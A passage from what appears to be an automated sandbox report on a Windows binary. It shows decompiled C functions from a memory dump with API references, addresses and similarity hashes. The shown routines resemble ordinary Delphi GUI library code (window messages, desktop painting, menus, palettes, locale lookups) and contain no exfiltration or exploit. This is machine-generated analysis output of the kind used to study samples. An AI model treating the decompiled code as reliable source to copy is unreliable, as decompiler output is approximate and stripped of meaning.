							_t27 = SendMessageA(E0044D590( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
							if(_t27 != 0) {
								_t42 = _t43 + _t27;
								E004046E4( &_v12, _v8, 0x43998c);
								goto L6;
							}
						}
					} else {
						E004046E4( &_v12, 0x43998c, _v8);
						L6:
						SendMessageA(E0044D590( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42);
						_t34 = E00404898(_v12);
						SendMessageA(E0044D590( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34);
					}
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(0x43997a);
				return E004043D8( &_v12);
			}

0x00439893
0x00439896
0x00439899
0x0043989b
0x0043989f
0x004398a0
0x004398a5
0x004398a8
0x004398ad
0x004398c9
0x004398cd
0x004398f8
0x004398fc
0x0043990f
0x00439916
0x00439918
0x00439925
0x00000000
0x00439925
0x00439916
0x004398cf
0x004398da
0x0043992a
0x0043993a
0x00439942
0x00439958
0x00439958
0x004398cd
0x0043995f
0x00439962
0x00439965
0x00439972

APIs

SendMessageA.USER32 ref: 004398C4
SendMessageA.USER32 ref: 004398F3
SendMessageA.USER32 ref: 0043990F
SendMessageA.USER32 ref: 0043993A
SendMessageA.USER32 ref: 00439958

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 52b2a5598674da164ebaf056403b39049885dbd175adf6d87f8b2696323507a8
Instruction ID: 61d0a38cf5ad884e31ac5b3a13015c4b603a4644f92994f135f47ebb2aefbb30
Opcode Fuzzy Hash: 52b2a5598674da164ebaf056403b39049885dbd175adf6d87f8b2696323507a8
Instruction Fuzzy Hash: 25213371B047446BE710EA669C82F5B76A8EF49708F10487E7905E72C1DBB9AD00C619

Uniqueness

Uniqueness Score: -1.00%

Function 0048AD8C, Relevance: 7.6, APIs: 5, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0048AD8C(intOrPtr __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				struct HDC__* _v12;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr _t75;
				void* _t81;
				void* _t83;
				intOrPtr _t84;

				_t81 = _t83;
				_t84 = _t83 + 0xffffffe8;
				_v8 = __eax;
				E0044CF7C(_v8, __ecx, __edx, _a4, _a8);
				_t35 = _v8;
				if( *((char*)(_t35 + 0x57)) != 0) {
					return _t35;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x230)))) + 0x40))();
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x230)))) + 0x34))();
					_v12 = GetDC(GetDesktopWindow());
					_push(_t81);
					_push(0x48ae58);
					_push( *[fs:eax]);
					 *[fs:eax] = _t84;
					BitBlt(E004294DC(E0042D8BC( *((intOrPtr*)(_v8 + 0x230)))), 0, 0,  *(_v8 + 0x48),  *(_v8 + 0x4c), _v12,  *(_v8 + 0x40),  *(_v8 + 0x44), 0xcc0020);
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(0x48ae5f);
					return ReleaseDC(GetDesktopWindow(), _v12);
				}
			}

0x0048ad8d
0x0048ad8f
0x0048ad95
0x0048ada3
0x0048ada8
0x0048adaf
0x0048b10e
0x0048adb5
0x0048adc6
0x0048adda
0x0048ade8
0x0048aded
0x0048adee
0x0048adf3
0x0048adf6
0x0048ae36
0x0048ae3d
0x0048ae40
0x0048ae43
0x0048ae57
0x0048ae57

APIs

Part of subcall function 0044CF7C: IsIconic.USER32(?), ref: 0044CFBB
Part of subcall function 0044CF7C: SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044CFD9

GetDesktopWindow.USER32 ref: 0048ADDD
GetDC.USER32(00000000), ref: 0048ADE3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0048AE36
GetDesktopWindow.USER32 ref: 0048AE4C
ReleaseDC.USER32(00000000,?), ref: 0048AE52

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Desktop$IconicRelease
String ID:
API String ID: 1424704201-0
Opcode ID: 1b0901c27eb55661872896334790a30d39a55c007051c2436a9fc4a1600690c9
Instruction ID: e77e1c3257bb93591b772a3682644900c9db5e1c0b88c139c983b2afcaad11cc
Opcode Fuzzy Hash: 1b0901c27eb55661872896334790a30d39a55c007051c2436a9fc4a1600690c9
Instruction Fuzzy Hash: 8A21F775A04204EFDB00EF99C995E9EBBF8EF09310F1140A6F904EB352D635AE00DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00457A7C, Relevance: 7.6, APIs: 5, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00457A7C(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E00457A7C(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E00457BAC(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E00457BAC(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E00457BAC(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E0045793C(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x456590; // 0x4565dc
						if(E004037A4( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E00457BAC(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}

0x00457a7c
0x00457a80
0x00457a86
0x00457a90
0x00457a92
0x00000000
0x00457a92
0x00457a9b
0x00457aa0
0x00000000
0x00457aa2
0x00457ab4
0x00457ab9
0x00457abd
0x00457ac2
0x00457acb
0x00457ad5
0x00457adc
0x00457aec
0x00457af1
0x00457af1
0x00457af3
0x00457af4
0x00457afa
0x00457b00
0x00457b35
0x00457b37
0x00457b3c
0x00000000
0x00457b42
0x00457b05
0x00457b12
0x00000000
0x00457b25
0x00457b29
0x00457b30
0x00000000
0x00457b30
0x00457b12
0x00457afa
0x00457b49

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e12cad267ee74e1320e98af3d2473b4d83076ed945f06cdfac160a6804a0f98
Instruction ID: 66c08ce3c6f31a992588c91cdbf30887e5f254a92de57971e36fdfe0368b16d7
Opcode Fuzzy Hash: 8e12cad267ee74e1320e98af3d2473b4d83076ed945f06cdfac160a6804a0f98
Instruction Fuzzy Hash: 04119321A486095ADB60BE3BAC05B5B76995F4170EF04013BBD00AB383CA7CED4D82AC

Uniqueness

Uniqueness Score: -1.00%

Function 0044EF5C, Relevance: 7.6, APIs: 5, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0044EF5C(void* __eax, void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t48;
				void* _t50;
				void* _t52;
				intOrPtr _t53;

				_t50 = _t52;
				_t53 = _t52 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x4bae68; // 0x4bc904
					_t17 =  *0x4bae68; // 0x4bc904
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L0042FCB4();
					_v8 = _t19;
					_push(_t50);
					_push(0x44f01c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t53;
					_t21 =  *0x4bb224; // 0x4bcb80
					E0042FCF4(_v8, E004653CC( *_t21, __ecx,  *((short*)(__eax + 0x68))));
					_t26 =  *0x4bb224; // 0x4bcb80
					E0042FCF4(_v8, E004653CC( *_t26, __ecx,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L0042FD48();
					_push( &_v16);
					_push(0);
					L0042FD58();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L0042FD48();
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(0x44f023);
					_t37 = _v8;
					_push(_t37);
					L0042FCBC();
					return _t37;
				}
			}

0x0044ef5d
0x0044ef5f
0x0044ef63
0x0044ef6a
0x0044f027
0x0044ef70
0x0044ef78
0x0044ef84
0x0044ef8b
0x0044ef8d
0x0044ef8e
0x0044ef93
0x0044ef98
0x0044ef99
0x0044ef9e
0x0044efa1
0x0044efa8
0x0044efb9
0x0044efc2
0x0044efd3
0x0044efd8
0x0044efda
0x0044efdc
0x0044efe1
0x0044efe2
0x0044efea
0x0044efeb
0x0044efed
0x0044eff5
0x0044eff9
0x0044effa
0x0044efff
0x0044f000
0x0044f007
0x0044f00a
0x0044f00d
0x0044f012
0x0044f015
0x0044f016
0x0044f01b
0x0044f01b

APIs

73F0908C.COMCTL32(00000000), ref: 0044EF8E

Part of subcall function 0042FCF4: 73F66EE7.COMCTL32(00444DB6,000000FF,00000000,0044EFBE,00000000,0044F01C,?,00000000), ref: 0042FCF8

73F66C88.COMCTL32(00444DB6,00000000,00000000,00000000,00000000,0044F01C,?,00000000), ref: 0044EFE2
73F66CDC.COMCTL32(00000000,?,00444DB6,00000000,00000000,00000000,00000000,0044F01C,?,00000000), ref: 0044EFED
73F66C88.COMCTL32(00444DB6,00000001,?,0044F085,00000000,?,00444DB6,00000000,00000000,00000000,00000000,0044F01C,?,00000000), ref: 0044F000
73F07CF1.COMCTL32(00444DB6,0044F023,0044F085,00000000,?,00444DB6,00000000,00000000,00000000,00000000,0044F01C,?,00000000), ref: 0044F016

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: F0908
String ID:
API String ID: 1027928615-0
Opcode ID: 0a05ad87dd09bc56209d99443117f197f5e9e84a0d2bab8f350996b43cc7c6d9
Instruction ID: 35e99998dc3e0a2ffff22f2567d4dd5ee2700d8fc3202683d2053a11a76ffa59
Opcode Fuzzy Hash: 0a05ad87dd09bc56209d99443117f197f5e9e84a0d2bab8f350996b43cc7c6d9
Instruction Fuzzy Hash: FE218135740304AFEB10EBA9DC82F6D73F8EB49704F9004B6B910DB291DAB5AD44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00467060, Relevance: 7.6, APIs: 5, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00467060(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x4bc668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00443B88(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0044D590(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}

0x00467060
0x00467064
0x00467066
0x00467068
0x0046706a
0x00467072
0x00467111
0x00467117
0x00467083
0x00467088
0x0046708c
0x004670f2
0x0046710f
0x0046710f
0x00000000
0x004670f2
0x0046708e
0x00467090
0x00467090
0x00467095
0x004670b0
0x004670b9
0x004670ae
0x00000000
0x004670ae
0x004670c1
0x004670c3
0x004670c3
0x00000000
0x0046709f
0x004670a4
0x004670c5
0x004670de
0x004670e0
0x004670e0
0x00000000
0x004670de
0x00467095

APIs

GetCapture.USER32 ref: 00467083
SendMessageA.USER32 ref: 004670D7
GetWindowLongA.USER32(00000000,000000FA), ref: 004670E7
SendMessageA.USER32 ref: 00467106

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CaptureLongWindow
String ID:
API String ID: 1158686931-0
Opcode ID: 10c289f50b82a2cb95b14777d12c040b3c483e201a65ddf1aa22a0736d1b4b50
Instruction ID: 9ed5478cb85dccc1fdacaa70bbac843085878d57661c3dc1fa15297e2471934d
Opcode Fuzzy Hash: 10c289f50b82a2cb95b14777d12c040b3c483e201a65ddf1aa22a0736d1b4b50
Instruction Fuzzy Hash: 09117C713086095FE660EA598D81A53B3DC9B29358B10483BFD59C7343FA69FC40877A

Uniqueness

Uniqueness Score: -1.00%

Function 0042DC68, Relevance: 7.6, APIs: 5, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042DC68(int __eax) {
				int _t21;
				signed int _t29;
				char _t34;
				int _t42;
				int _t43;
				struct HDC__* _t44;
				intOrPtr _t45;

				_t21 = __eax;
				_t42 = __eax;
				_t45 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t45 + 0x14));
					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
						E0042C5D4(_t22);
					}
					_t21 = E00429FD0( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
					_t43 = _t21;
					 *(_t45 + 0x10) = _t43;
					if(_t43 == 0) {
						_t44 = E004298D4(GetDC(0));
						if( *((char*)(_t45 + 0x71)) != 0) {
							L9:
							_t34 = 1;
						} else {
							_t29 = GetDeviceCaps(_t44, 0xc);
							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
								goto L9;
							} else {
								_t34 = 0;
							}
						}
						 *((char*)(_t45 + 0x71)) = _t34;
						if(_t34 != 0) {
							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
						}
						_t21 = ReleaseDC(0, _t44);
						if( *(_t45 + 0x10) == 0) {
							 *((char*)(_t42 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}

0x0042dc68
0x0042dc6c
0x0042dc6e
0x0042dc75
0x0042dc8f
0x0042dc95
0x0042dc97
0x0042dc97
0x0042dcae
0x0042dcb3
0x0042dcb5
0x0042dcba
0x0042dcc8
0x0042dcce
0x0042dcf7
0x0042dcf7
0x0042dcd0
0x0042dcd3
0x0042dcf1
0x00000000
0x0042dcf3
0x0042dcf3
0x0042dcf3
0x0042dcf1
0x0042dcf9
0x0042dcfe
0x0042dd06
0x0042dd06
0x0042dd0c
0x0042dd15
0x0042dd17
0x00000000
0x0042dd17
0x0042dd15
0x0042dcba
0x0042dd1f

APIs

GetDC.USER32(00000000), ref: 0042DCBE
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042DCD3
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042DCDD
CreateHalftonePalette.GDI32(00000000), ref: 0042DD01
ReleaseDC.USER32(00000000,00000000), ref: 0042DD0C

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease
String ID:
API String ID: 2404249990-0
Opcode ID: e5dd97116162e55957adf1c9b33213b73bdfa514209594ef851dd4e65cec3bd4
Instruction ID: cb91f00d1bb0f312b2eec9ff1cece74945c0493f8764cf7b3fe5b1e156172a6d
Opcode Fuzzy Hash: e5dd97116162e55957adf1c9b33213b73bdfa514209594ef851dd4e65cec3bd4
Instruction Fuzzy Hash: 6C11B421B456A99ADB20EF26E8417EF3691AF16315F45012BFC009B2C1D7B8DC90C3A9

Uniqueness

Uniqueness Score: -1.00%

Function 00464608, Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00464608(void* __eax) {
				void* _t16;
				void* _t39;
				signed int _t42;

				_t16 = __eax;
				_t39 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x4a0f30 != 0) {
					_t16 = E0044D894(__eax);
					if(_t16 != 0) {
						_t42 = GetWindowLongA(E0044D590(_t39), 0xffffffec);
						if( *((char*)(_t39 + 0x2e0)) != 0 ||  *((char*)(_t39 + 0x2e8)) != 0) {
							if((_t42 & 0x00080000) == 0) {
								SetWindowLongA(E0044D590(_t39), 0xffffffec, _t42 | 0x00080000);
							}
							return  *0x4a0f30(E0044D590(_t39),  *((intOrPtr*)(_t39 + 0x2ec)),  *((intOrPtr*)(_t39 + 0x2e1)),  *0x004A0FB4 |  *0x004A0FBC);
						} else {
							SetWindowLongA(E0044D590(_t39), 0xffffffec, _t42 & 0xfff7ffff);
							return RedrawWindow(E0044D590(_t39), 0, 0, 0x485);
						}
					}
				}
				return _t16;
			}

0x00464608
0x0046460a
0x00464610
0x00464625
0x0046462c
0x00464641
0x0046464a
0x0046465b
0x0046466e
0x0046466e
0x00000000
0x004646b0
0x004646c1
0x00000000
0x004646d7
0x0046464a
0x0046462c
0x004646de

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 0046463C
SetWindowLongA.USER32 ref: 0046466E
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000), ref: 004646A8
SetWindowLongA.USER32 ref: 004646C1
RedrawWindow.USER32(00000000,00000000,00000000,00000485), ref: 004646D7

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesLayeredRedraw
String ID:
API String ID: 1758778077-0
Opcode ID: 3c038fd038d718effa79482ac70d7f62af5ae0354344cce6d7e69e2d05fc4cf7
Instruction ID: 743cb5dbe80092d2c8819057339aa221accddce0e4c4bbed4f98890f545d9406
Opcode Fuzzy Hash: 3c038fd038d718effa79482ac70d7f62af5ae0354344cce6d7e69e2d05fc4cf7
Instruction Fuzzy Hash: EF11AB60E0439429DF50BE798C89B8B2A481B4B318F0419BB7C59EB2C7DA7C9844C76D

Uniqueness

Uniqueness Score: -1.00%

Function 00429F38, Relevance: 7.6, APIs: 5, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00429F38(void* __eax) {
				char _v5;
				struct HDC__* _v12;
				struct HPALETTE__* _t21;
				struct HPALETTE__* _t25;
				void* _t28;
				intOrPtr _t35;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t37 = _t39;
				_t40 = _t39 + 0xfffffff8;
				_t28 = __eax;
				_v5 = 0;
				if( *0x4bc890 == 0) {
					return _v5;
				} else {
					_v12 = GetDC(0);
					_push(_t37);
					_push(0x429fbe);
					_push( *[fs:edx]);
					 *[fs:edx] = _t40;
					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
						_t21 =  *0x4bc890; // 0xe4080bba
						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
						_t25 =  *0x4bc890; // 0xe4080bba
						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
						_v5 = 1;
					}
					_pop(_t35);
					 *[fs:eax] = _t35;
					_push(0x429fc5);
					return ReleaseDC(0, _v12);
				}
			}

0x00429f39
0x00429f3b
0x00429f3f
0x00429f41
0x00429f4c
0x00429fcc
0x00429f4e
0x00429f55
0x00429f5a
0x00429f5b
0x00429f60
0x00429f63
0x00429f74
0x00429f7e
0x00429f84
0x00429f96
0x00429f9c
0x00429fa1
0x00429fa1
0x00429fa7
0x00429faa
0x00429fad
0x00429fbd
0x00429fbd

APIs

GetDC.USER32(00000000), ref: 00429F50
GetDeviceCaps.GDI32(?,00000068), ref: 00429F6C
GetPaletteEntries.GDI32(E4080BBA,00000000,00000008,?), ref: 00429F84
GetPaletteEntries.GDI32(E4080BBA,00000008,00000008,?), ref: 00429F9C
ReleaseDC.USER32(00000000,?), ref: 00429FB8

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: EntriesPalette$CapsDeviceRelease
String ID:
API String ID: 3128150645-0
Opcode ID: 10d50dc47d2b8c96816fc221240eb5fffe8f7f767b051c317bbe0caffc6fc6ea
Instruction ID: 571c0472301933cc8f5f19b439415469b68c4971539fea969f667e4e13ceae94
Opcode Fuzzy Hash: 10d50dc47d2b8c96816fc221240eb5fffe8f7f767b051c317bbe0caffc6fc6ea
Instruction Fuzzy Hash: 2D11C83164C304BFFB40DFA5DC86F6977E8E709704F51806AF508DA1C1DA7A5814C729

Uniqueness

Uniqueness Score: -1.00%

Function 0040C55C, Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040C55C(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40c5f3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040C2D4(GetThreadLocale(), 0x40c608, 0x100b,  &_v8);
				_t29 = E00408EF0(0x40c608, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040C4A8, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x4bc770;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040C4E4, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040C5FA);
				return E004043D8( &_v8);
			}

0x0040c55c
0x0040c55f
0x0040c564
0x0040c565
0x0040c56a
0x0040c56d
0x0040c583
0x0040c595
0x0040c59f
0x0040c5af
0x0040c5b4
0x0040c5b9
0x0040c5be
0x0040c5be
0x0040c5c4
0x0040c5c7
0x0040c5c7
0x0040c5d8
0x0040c5d8
0x0040c5df
0x0040c5e2
0x0040c5e5
0x0040c5f2

APIs

GetThreadLocale.KERNEL32(?,00000000,0040C5F3,?,?,00000000), ref: 0040C574

Part of subcall function 0040C2D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C2F2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040C5F3,?,?,00000000), ref: 0040C5A4
EnumCalendarInfoA.KERNEL32(Function_0000C4A8,00000000,00000000,00000004), ref: 0040C5AF
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040C5F3,?,?,00000000), ref: 0040C5CD
EnumCalendarInfoA.KERNEL32(Function_0000C4E4,00000000,00000000,00000003), ref: 0040C5D8

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 74be71e9e496f6d6a6108d706a2896d0c017754716cc60a9f7fc2533e1e48256
Instruction ID: c2d6cbf74ea996368d7c25073d6da1e85f638712900491ff8c76fb98fc9c77f7
Opcode Fuzzy Hash: 74be71e9e496f6d6a6108d706a2896d0c017754716cc60a9f7fc2533e1e48256
Instruction Fuzzy Hash: 2101D475200214BAE611B7A58C52F5A365CDB46724F62067BB801F66C2DA7DAF10466C

Uniqueness

Uniqueness Score: -1.00%

Function 004693C4, Relevance: 7.5, APIs: 5, Instructions: 41
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004693C4(intOrPtr _a4) {
				intOrPtr _t15;
				struct HMENU__* _t26;

				_t15 =  *((intOrPtr*)(_a4 - 4));
